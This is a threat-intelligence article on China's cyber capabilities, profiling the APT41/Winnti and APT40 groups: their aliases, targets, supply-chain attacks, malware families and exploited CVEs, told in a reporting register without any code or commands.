Over the past two decades, the People’s Republic of China (PRC) has been steadily building its cyber power eventually reaching the point where it is now considered one of the most prominent cyber players. Since the early 2000s, China has been competing with the United States and its allies over dominance of global cyberspace, a battle aggravated by US' determination to sanction Chinese tech firms in response to country’s malicious behavior in cyberspace.

More than once China was accused of conducting “large-scale cyber operations abroad, aiming to acquire intellectual property, achieve political influence, carry out state-on-state espionage and position capabilities for disruptive effect in case of future conflict”. According to a research by the London-based think tank International Institute for Strategic Studies (IISS), while China is considered a second-tier cyber power, due to its “growing industrial base in digital technology, it is the state best placed to join the US in the first tier.” However, IISS also pointed out that poor security and weak cyber-resilience policies for its critical national infrastructure undermines China’s strengths as a cyber power.

Once known for launching “smash and grab” operations seeking to simply steal large amounts of data from their victims as quickly as possible, China’s cyber threat groups have become more sophisticated over the years, constantly evolving their tactics, techniques, and procedures (TTPs).

China’s cyber-espionage operations have included compromising telecommunications firms, providers of managed services and broadly used software, defense contractors and other targets of interest.

China-linked threat actors have also conducted cyber operations in order to obtain information on members of Western governments, militaries and contractors, and have collected huge amounts of data on the US citizens by breaching organizations like the US Office of Personnel Management (OPM) and the Equifax credit bureau.

In February 2020, the US authorities charged four alleged members of China’s People’s Liberation Army with hacking into the computer systems of the credit reporting agency Equifax.

The following sections in the article highlight some of the best-known advanced persistent threat groups (APT) associated with China, including their targets, tactics, techniques, and procedures (TTPs).

APT41/Winnti

APT41 (aka Barium, Winnti, Wicked Panda, Wicked Spider, Axiom, Lead, BlackFly) is one of the most prolific state-sponsored groups linked to the Chinese government. Active since at least 2010, the threat actor is believed to be behind malicious campaigns aimed at a wide variety of sectors, including the healthcare, pharmaceutical, telecommunications, and video game industries across multiple countries, including the US, Japan, South Korea, India, Australia, and the UK.

The group is well-known for a series of high-profile supply-chain attacks against the software industry, involving the distribution of tainted software in order to compromise more victims. Winnti has been linked by security researchers to some notable suply-chain attacks, including the CCleaner, NetSarang, and Asus Live Update compromises.

Winnti has an extensive arsenal of malware, including widely available tools such as Metasploit and Cobalt Strike, and custom-made malware, including the Winnti trojan, various droppers, loaders, and injectors, as well as Crosswalk, ShadowPad, FunnySwitch, PipeMon, and PlugX backdoors.

While APT41 mostly conducts espionage, the actor was also observed engaging in financially motivated activity for personal gain.

Given that Chinese threat actors typically tend to share malware tools among themselves, there is a significant lack of clarity within the cybersecurity community on precisely which groups are behind the attacks that have been lumped together under the Winnti umbrella.

APT41 has been linked by researchers to a large-scale campaign in early 2020 that affected a wide variety of industries across the world. In this campaign the threat actors leveraged a number of high severity vulnerabilities in Cisco routers, Citrix infrastructure devices, and Zoho ManageEngine Desktop Central, an endpoint management software tool. In September 2020, the US Department of Justice unsealed three indictments that brought charges against five Chinese nationals and two Malaysians for network intrusions across over 100 victim organizations in multiple countries.

The Winnti group has also been observed using stolen digital certificates to sign malware, and exploiting remote access or internet facing services to gain initial access to victim networks.

APT40

APT40 (aka Gadolinium, Leviathan, TEMP.Periscope) is yet another APT group with alleged ties to the Chinese government. Active since 2013, this threat actor is primarily focused on nations and issues related to the South China Sea, a region which has long been a subject of territorial disputes between China and Brunei, Indonesia, Malaysia, the Philippines, Taiwan, and Vietnam.

APT40’ s known targets include organizations in engineering, shipbuilding, healthcare, government, maritime, and academic sectors within multiple countries bordering the South China Sea.

The group uses a variety of malicious software, including publicly available tools, like Cobalt Strike, or custom tools used by other Chinese threat actors (Airbreak, Freshair, and Beacon first-stage backdoors, the China Chopper webshell, Photo and Badflick backdoors).

APT40 has been observed using a variety of techniques for initial compromise, including web server exploitation and phishing campaigns (involving malicious attachments or Google Drive links) delivering backdoors. The threat actor relies on web shells for initial access to a victim’s network, which allows hackers to maintain access to the environment, re-infect victim systems, and facilitate lateral movement.

The group has been known using exploits in their phishing campaigns, often taking advantage of software issues within days of their disclosure. The observed vulnerabilities include CVE-2012-0158 (Microsoft Office), CVE-2017-0199 (Microsoft Office), CVE-2017-8759 (Microsoft .NET Framework), CVE-2017-11882 (Microsoft Office).